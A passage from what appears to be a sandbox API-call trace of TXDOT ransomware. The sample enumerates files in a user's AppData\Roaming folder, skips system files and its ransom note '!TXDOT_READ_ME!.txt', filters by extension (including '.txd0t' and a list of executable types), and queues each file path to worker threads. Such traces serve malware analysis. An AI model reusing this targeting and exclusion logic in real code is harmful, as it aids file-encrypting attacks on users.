psz2="desktop.ini") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="autorun.inf") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="ntuser.dat") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="ntldr") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="ntdetect.com") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="bootfont.bin") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.190] PathFindExtensionW (pszPath="aNTcu_iQUI-LLKOyho.avi") returned=".avi" [0072.190] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.190] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.190] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.190] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.201] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.201] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" [0072.201] SetEvent (hEvent=0x408) returned 1 [0072.201] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b9a3ff0, ftCreationTime.dwHighDateTime=0x1d5eeb7, ftLastAccessTime.dwLowDateTime=0x91ed70, ftLastAccessTime.dwHighDateTime=0x1d5e832, ftLastWriteTime.dwLowDateTime=0x91ed70, ftLastWriteTime.dwHighDateTime=0x1d5e832, nFileSizeHigh=0x0, nFileSizeLow=0xfb3f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="c39tCHh.avi", cAlternateFileName="")) returned 1 [0072.201] StrCmpW (psz1="c39tCHh.avi", psz2=".") returned 1 [0072.201] StrCmpW (psz1="c39tCHh.avi", psz2="..") returned 1 [0072.201] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="c39tCHh.avi", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" [0072.201] PathFindExtensionW (pszPath="c39tCHh.avi") returned=".avi" [0072.201] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="bootsect.bak") returned 1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="iconcache.db") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="thumbs.db") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2=" ransomware ") returned 1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2=" ransom ") returned 1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="debug.txt") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="boot.ini") returned 1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="desktop.ini") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="autorun.inf") returned 1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="ntuser.dat") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="ntldr") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="ntdetect.com") returned -1 [0072.201] StrCmpIW (psz1="c39tCHh.avi", psz2="bootfont.bin") returned 1 [0072.202] StrCmpIW (psz1="c39tCHh.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.202] PathFindExtensionW (pszPath="c39tCHh.avi") returned=".avi" [0072.202] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.202] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.202] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.202] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.215] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.215] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi" [0072.215] SetEvent (hEvent=0x3fc) returned 1 [0072.215] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a7d2dc0, ftCreationTime.dwHighDateTime=0x1d5e3ad, ftLastAccessTime.dwLowDateTime=0x40bcd7c0, ftLastAccessTime.dwHighDateTime=0x1d5e68e, ftLastWriteTime.dwLowDateTime=0x40bcd7c0, ftLastWriteTime.dwHighDateTime=0x1d5e68e, nFileSizeHigh=0x0, nFileSizeLow=0xe0cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CjrpV8NWiwYR.png", cAlternateFileName="CJRPV8~1.PNG")) returned 1 [0072.215] StrCmpW (psz1="CjrpV8NWiwYR.png", psz2=".") returned 1 [0072.215] StrCmpW (psz1="CjrpV8NWiwYR.png", psz2="..") returned 1 [0072.215] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.215] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.216] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CjrpV8NWiwYR.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" [0072.216] PathFindExtensionW (pszPath="CjrpV8NWiwYR.png") returned=".png" [0072.216] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="bootsect.bak") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="iconcache.db") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="thumbs.db") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2=" ransomware ") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2=" ransom ") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="debug.txt") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="boot.ini") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="desktop.ini") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="autorun.inf") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="ntuser.dat") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="ntldr") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="ntdetect.com") returned -1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="bootfont.bin") returned 1 [0072.216] StrCmpIW (psz1="CjrpV8NWiwYR.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.216] PathFindExtensionW (pszPath="CjrpV8NWiwYR.png") returned=".png" [0072.216] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.216] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.216] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.216] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.216] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.217] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png" [0072.217] SetEvent (hEvent=0x418) returned 1 [0072.217] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e009a0, ftCreationTime.dwHighDateTime=0x1d5e9e5, ftLastAccessTime.dwLowDateTime=0x8b112b50, ftLastAccessTime.dwHighDateTime=0x1d5ebd4, ftLastWriteTime.dwLowDateTime=0x8b112b50, ftLastWriteTime.dwHighDateTime=0x1d5ebd4, nFileSizeHigh=0x0, nFileSizeLow=0x12ea9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CUCgHoAM.wav", cAlternateFileName="")) returned 1 [0072.217] StrCmpW (psz1="CUCgHoAM.wav", psz2=".") returned 1 [0072.217] StrCmpW (psz1="CUCgHoAM.wav", psz2="..") returned 1 [0072.217] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.217] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CUCgHoAM.wav", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" [0072.217] PathFindExtensionW (pszPath="CUCgHoAM.wav") returned=".wav" [0072.217] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="bootsect.bak") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="iconcache.db") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="thumbs.db") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2=" ransomware ") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2=" ransom ") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="debug.txt") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="boot.ini") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="desktop.ini") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="autorun.inf") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="ntuser.dat") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="ntldr") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="ntdetect.com") returned -1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="bootfont.bin") returned 1 [0072.217] StrCmpIW (psz1="CUCgHoAM.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.217] PathFindExtensionW (pszPath="CUCgHoAM.wav") returned=".wav" [0072.218] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0072.218] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.218] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.218] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.233] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.233] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" [0072.233] SetEvent (hEvent=0x408) returned 1 [0072.233] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1b97a70, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0xc073c5d0, ftLastAccessTime.dwHighDateTime=0x1d5e78f, ftLastWriteTime.dwLowDateTime=0xc073c5d0, ftLastWriteTime.dwHighDateTime=0x1d5e78f, nFileSizeHigh=0x0, nFileSizeLow=0x15207, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cv28-Ixq4k3KD.mkv", cAlternateFileName="CV28-I~1.MKV")) returned 1 [0072.233] StrCmpW (psz1="cv28-Ixq4k3KD.mkv", psz2=".") returned 1 [0072.233] StrCmpW (psz1="cv28-Ixq4k3KD.mkv", psz2="..") returned 1 [0072.233] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.233] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.233] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="cv28-Ixq4k3KD.mkv", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" [0072.233] PathFindExtensionW (pszPath="cv28-Ixq4k3KD.mkv") returned=".mkv" [0072.233] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="bootsect.bak") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="iconcache.db") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="thumbs.db") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2=" ransomware ") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2=" ransom ") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="debug.txt") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="boot.ini") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="desktop.ini") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="autorun.inf") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="ntuser.dat") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="ntldr") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="ntdetect.com") returned -1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="bootfont.bin") returned 1 [0072.233] StrCmpIW (psz1="cv28-Ixq4k3KD.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.233] PathFindExtensionW (pszPath="cv28-Ixq4k3KD.mkv") returned=".mkv" [0072.233] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0072.234] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.234] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.234] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.242] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.242] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" [0072.242] SetEvent (hEvent=0x3fc) returned 1 [0072.242] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4194c0, ftCreationTime.dwHighDateTime=0x1d5e2dd, ftLastAccessTime.dwLowDateTime=0xc7d533d0, ftLastAccessTime.dwHighDateTime=0x1d5e515, ftLastWriteTime.dwLowDateTime=0xc7d533d0, ftLastWriteTime.dwHighDateTime=0x1d5e515, nFileSizeHigh=0x0, nFileSizeLow=0x12520, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="D3INp6Ei.xlsx", cAlternateFileName="D3INP6~1.XLS")) returned 1 [0072.242] StrCmpW (psz1="D3INp6Ei.xlsx", psz2=".") returned 1 [0072.242] StrCmpW (psz1="D3INp6Ei.xlsx", psz2="..") returned 1 [0072.242] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="D3INp6Ei.xlsx", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" [0072.242] PathFindExtensionW (pszPath="D3INp6Ei.xlsx") returned=".xlsx" [0072.242] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0072.242] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="bootsect.bak") returned 1 [0072.242] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="iconcache.db") returned -1 [0072.242] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="thumbs.db") returned -1 [0072.242] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2=" ransomware ") returned 1 [0072.242] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2=" ransom ") returned 1 [0072.243] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="debug.txt") returned -1 [0072.243] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="boot.ini") returned 1 [0072.243] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="desktop.ini") returned -1 [0072.243] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="autorun.inf") returned 1 [0072.243] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="ntuser.dat") returned -1 [0072.244] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="ntldr") returned -1 [0072.244] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="ntdetect.com") returned -1 [0072.244] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="bootfont.bin") returned 1 [0072.244] StrCmpIW (psz1="D3INp6Ei.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.244] PathFindExtensionW (pszPath="D3INp6Ei.xlsx") returned=".xlsx" [0072.244] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0072.244] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.244] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.244] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.252] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.252] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" [0072.252] SetEvent (hEvent=0x418) returned 1 [0072.252] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5695d100, ftCreationTime.dwHighDateTime=0x1d5edff, ftLastAccessTime.dwLowDateTime=0xa693630, ftLastAccessTime.dwHighDateTime=0x1d5e915, ftLastWriteTime.dwLowDateTime=0xa693630, ftLastWriteTime.dwHighDateTime=0x1d5e915, nFileSizeHigh=0x0, nFileSizeLow=0x1677c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DRvrEGQ_bV7.png", cAlternateFileName="DRVREG~1.PNG")) returned 1 [0072.252] StrCmpW (psz1="DRvrEGQ_bV7.png", psz2=".") returned 1 [0072.252] StrCmpW (psz1="DRvrEGQ_bV7.png", psz2="..") returned 1 [0072.253] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.253] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.253] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DRvrEGQ_bV7.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" [0072.253] PathFindExtensionW (pszPath="DRvrEGQ_bV7.png") returned=".png" [0072.253] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="bootsect.bak") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="iconcache.db") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="thumbs.db") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2=" ransomware ") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2=" ransom ") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="debug.txt") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="boot.ini") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="desktop.ini") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="autorun.inf") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="ntuser.dat") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="ntldr") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="ntdetect.com") returned -1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="bootfont.bin") returned 1 [0072.253] StrCmpIW (psz1="DRvrEGQ_bV7.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.253] PathFindExtensionW (pszPath="DRvrEGQ_bV7.png") returned=".png" [0072.253] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.253] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.253] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.253] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.261] 